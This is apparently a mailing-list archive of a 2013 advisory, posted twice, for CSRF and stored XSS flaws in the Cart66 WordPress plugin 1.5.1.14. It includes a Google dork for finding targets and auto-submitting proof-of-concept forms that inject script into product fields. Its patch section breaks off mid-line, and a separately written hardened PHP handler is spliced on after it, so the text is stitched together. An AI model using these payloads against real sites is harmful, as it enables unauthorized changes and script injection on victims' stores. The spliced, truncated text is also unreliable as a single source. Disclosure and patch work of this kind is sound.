Wordpress Cart66 Plugin 1.5.1.14 Multiple Vulnerabilities

2013-10-14 Thread jsibley1
# Exploit Title: Wordpress Cart66 Plugin 1.5.1.14 Multiple Vulnerabilities
# Exploit Author: absane
# Blog: http://blog.noobroot.com
# Discovery date: September 29th 2013
# Vendor notified: September 29th 2013
# Vendor fixed: October 12 2013
# Vendor Homepage: http://cart66.com
# Software Link: http://downloads.wordpress.org/plugin/cart66-lite.1.5.1.14.zip
# Tested on: Wordpress 3.6.1
# Google-dork: inurl:/wp-content/plugins/cart66
# CVE (CSRF): CVE-2013-5977
# CVE (XSS): CVE-2013-5978

Two vulnerabilities were discovered in the Wordpress plugin Cart66 version 1.5.1.14.

Vulnerabilities:
1) CSRF
2) Code Injection

VULNERABILITY #1

*** CSRF ***

Page affected: 
http://[victim_site]/wordpress/wp-admin/admin.php?page=cart66-products


Proof of Concept


<html><body>
<form name="csrf_form" action="http://192.168.196.135/wordpress/wp-admin/admin.php?page=cart66-products" method="post" enctype="multipart/form-data" id="products-form">
<input type="hidden" name="cart66-action" value="save product" />
<input type="hidden" name="product[id]" value="" />
<input class="long" type="hidden" name="product[name]" id="product-name" value="absane was here" />
<input type="hidden" name="product[item_number]" id="product-item_number" value="1337" />
<input type="hidden" id="product-price" name="product[price]" value="13.37" />
<input type="hidden" id="product-price_description" name="product[price_description]" value="LuLz" />
<input type="hidden" id="product-is_user_price" name="product[is_user_price]" value="0" />
<input type="hidden" id="product-min_price" name="product[min_price]" value="" />
<input type="hidden" id="product-max_price" name="product[max_price]" value="" />
<input type="hidden" id="product-taxable" name="product[taxable]" value="0" />
<input type="hidden" id="product-shipped" name="product[shipped]" value="1" />
<input type="hidden" id="product-weight" name="product[weight]" value="" />
<input type="hidden" id="product-min_qty" name="product[min_quantity]" value="" />
<input type="hidden" id="product-max_qty" name="product[max_quantity]" value="" />
<script type="text/javascript">document.csrf_form.submit();</script>
</form>
</body></html>

VULNERABILITY #2
***
*** Code Injection  ***
***
Page affected: 
http://[victim_site]/wordpress/wp-admin/admin.php?page=cart66-products in the 
following input fields:
* Product name
* Price description


Proof of Concept

In the vulnerable fields add <script>alert(0)</script> or any other code. The code is placed directly into the database.

Input is not sanitized and the code can be executed in ways that depend on the circumstances. During testing, the theme 'iShop 1.0.0' was used and the PoC JavaScript code was executed when I attempted to add a product or modify an existing product.


][
]..SOLUTIONS.[
][

Update to version 1.5.1.15 or greater. 


Wordpress Cart66 Plugin 1.5.1.14 Multiple Vulnerabilities

2013-10-11 Thread jsibley1
# Exploit Title: Wordpress Cart66 Plugin 1.5.1.14 Multiple Vulnerabilities
# Exploit Author: absane
# Blog: http://blog.noobroot.com
# Discovery date: September 29th 2013
# Vendor notified: September 29th 2013
# Vendor fixed: October 2 2013
# Vendor Homepage: http://cart66.com
# Software Link: http://downloads.wordpress.org/plugin/cart66-lite.1.5.1.14.zip
# Tested on: Wordpress 3.6.1
# Google-dork: inurl:/wp-content/plugins/cart66
# CVE (CSRF): CVE-2013-5977
# CVE (XSS): CVE-2013-5978

Two vulnerabilities were discovered in the Wordpress plugin Cart66 version 1.5.1.14.

Vulnerabilities:
1) XSS (Stored)
2) CSRF


VULNERABILITY #1
***
*** Stored XSS  ***
***
Page affected: 
http://[victim_site]/wordpress/wp-admin/admin.php?page=cart66-products in the 
following input fields:
* Product name
* Price description


Proof of Concept

In the vulnerable fields add <script>alert(0)</script>

The product name XSS vuln is particularly dangerous because an attacker can use the CSRF vulnerability to add a product whose name is a malicious script. All the admin user needs to do is view the product to be attacked.


//
\\


VULNERABILITY #2

*** CSRF ***

Page affected: 
http://[victim_site]/wordpress/wp-admin/admin.php?page=cart66-products

If the Wordpress admin were logged in and clicked on a link hosting code similar to the one in the PoC, then the admin may unknowingly add a product to his site or have an existing product altered. Other possibilities include, but are not limited to, injecting code into a field vulnerable to stored XSS (see the second vulnerability).


Proof of Concept

Host this code on a remote webserver different from the Wordpress site that uses Cart66. As an authenticated Wordpress admin user visit the page and add what you will to the fields. A new product is added. In a live attack, the fields will be hidden, prefilled, and some JavaScript code will auto submit the fields.


<html><body>
<form name="csrf_form" action="http://192.168.196.135/wordpress/wp-admin/admin.php?page=cart66-products" method="post" enctype="multipart/form-data" id="products-form">
<input type="hidden" name="cart66-action" value="save product" />
<input type="hidden" name="product[id]" value="" />
<input class="long" type="hidden" name="product[name]" id="product-name" value='<script>alert("pwned")</script>' />
<input type="hidden" name="product[item_number]" id="product-item_number" value="1337" />
<input type="hidden" id="product-price" name="product[price]" value="13.37" />
<input type="hidden" id="product-price_description" name="product[price_description]" value='<script>alert(";)")</script>' />
<input type="hidden" id="product-is_user_price" name="product[is_user_price]" value="0" />
<input type="hidden" id="product-min_price" name="product[min_price]" value="" />
<input type="hidden" id="product-max_price" name="product[max_price]" value="" />
<input type="hidden" id="product-taxable" name="product[taxable]" value="0" />
<input type="hidden" id="product-shipped" name="product[shipped]" value="1" />
<input type="hidden" id="product-weight" name="product[weight]" value="" />
<input type="hidden" id="product-min_qty" name="product[min_quantity]" value="" />
<input type="hidden" id="product-max_qty" name="product[max_quantity]" value="" />
<script type="text/javascript">document.csrf_form.submit();</script>
</form>
</body></html>


][
]..SOLUTIONS.[
][

Grab the latest update! Or... 

XSS

In products.php, replace the line:
$product->setData($_POST['product']);

with:
$product->setData(Cart66Common::postVal('product'));

CSRF

In products.php, replace the following:

<form action="admin.php?page=cart66-products" method="post" enctype="multipart/form-data" id="products-form">
  <input type="hidden" name="cart66-action" value="save product" />
  <input type="hidden" name="product[id]" value="<?php echo $product->id ?>" />
  <div id="widgets-left" style="margin-right: 50px;">
    <div id="available-widgets">

with:

<form action="admin.php?page=cart66-products" method="post" enctype="multipart/form-data" id="products-form">
  <input type="hidden" name="cart66_product_nonce" value="<?php echo wp_create_nonce('cart66_product_nonce'); ?>" />
  <input type="hidden" name="cart66-action" value="save product" />
  <input type="hidden" name="product[id]" value="<?php echo $product->id ?>" />
  <div id="widgets-left" style="margin-right: 50px;">
    <div id="available-widgets">

And, in Cart66Product.php replace the validate() function with:

  public function validate() {
    $errors = array();

    if(!wp_verify_nonce($_POST['cart66_product_nonce'], 'cart66_product_nonce')) {
      $errors['nonce
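The two controls the fix above applies (a per-user nonce checked on save against CSRF, and sanitizing input so a product name such as <script>alert(0)</script> cannot reach the database as markup) are shown together in the following added example. This is illustrative code written for this page, not Cart66's code and not the advisory author's patch; the example_* function names, the example-products page slug, the example_product_nonce field name and the example_save_product nonce action are all hypothetical, and the storage call is left as a comment. It also adds a capability check and escapes on output, which the advisory does not cover.

```php
<?php
// Added example (hypothetical names, not Cart66's code): a hardened WordPress
// admin "save product" handler that applies a nonce (CSRF), a capability check
// (least privilege), input sanitization (stored XSS) and output escaping.

// Render the product form with a nonce field beside the product fields.
function example_render_product_form( array $product ) {
    ?>
    <form action="admin.php?page=example-products" method="post" id="products-form">
        <?php wp_nonce_field( 'example_save_product', 'example_product_nonce' ); ?>
        <input type="hidden" name="example-action" value="save product" />
        <input type="hidden" name="product[id]" value="<?php echo esc_attr( $product['id'] ); ?>" />
        <!-- Escape on output: a stored name containing <script> is rendered as text,
             never as markup, even if it somehow bypassed input sanitization. -->
        <input type="text" name="product[name]"
               value="<?php echo esc_attr( $product['name'] ); ?>" />
        <input type="text" name="product[price_description]"
               value="<?php echo esc_attr( $product['price_description'] ); ?>" />
        <?php submit_button( 'Save' ); ?>
    </form>
    <?php
}

// Allow-list the fields and coerce each one to its expected type.
// sanitize_text_field() strips tags, so "<script>alert(0)</script>" becomes "alert(0)".
function example_sanitize_product( array $raw ) {
    $text = function ( $key ) use ( $raw ) {
        return isset( $raw[ $key ] ) ? sanitize_text_field( wp_unslash( $raw[ $key ] ) ) : '';
    };
    return array(
        'id'                => isset( $raw['id'] ) ? absint( $raw['id'] ) : 0,
        'name'              => $text( 'name' ),
        'item_number'       => $text( 'item_number' ),
        'price'             => isset( $raw['price'] ) ? round( floatval( $raw['price'] ), 2 ) : 0.0,
        'price_description' => $text( 'price_description' ),
        'taxable'           => ! empty( $raw['taxable'] ) ? 1 : 0,
        'shipped'           => ! empty( $raw['shipped'] ) ? 1 : 0,
    );
}

// Handle the POST. A form hosted on another site cannot supply a valid nonce,
// so the cross-origin submission in the advisory's PoC is rejected here.
function example_handle_product_save() {
    if ( ! isset( $_POST['example-action'] ) || 'save product' !== $_POST['example-action'] ) {
        return;
    }
    // CSRF: wp_verify_nonce() returns false for a missing, forged or expired token.
    if ( ! isset( $_POST['example_product_nonce'] ) ||
         ! wp_verify_nonce( $_POST['example_product_nonce'], 'example_save_product' ) ) {
        wp_die( 'Security check failed.', 'Forbidden', array( 'response' => 403 ) );
    }
    // Least privilege: only users who may manage the site can save products.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', 'Forbidden', array( 'response' => 403 ) );
    }
    $raw   = ( isset( $_POST['product'] ) && is_array( $_POST['product'] ) ) ? $_POST['product'] : array();
    $clean = example_sanitize_product( $raw );
    // ... persist $clean with the plugin's own storage call (hypothetical) ...
}
add_action( 'admin_init', 'example_handle_product_save' );
```

Sanitizing on input and escaping on output are deliberately both present: the first keeps markup out of the database, the second protects every template that later prints the stored value, including themes (such as the one named in the advisory) that the plugin does not control.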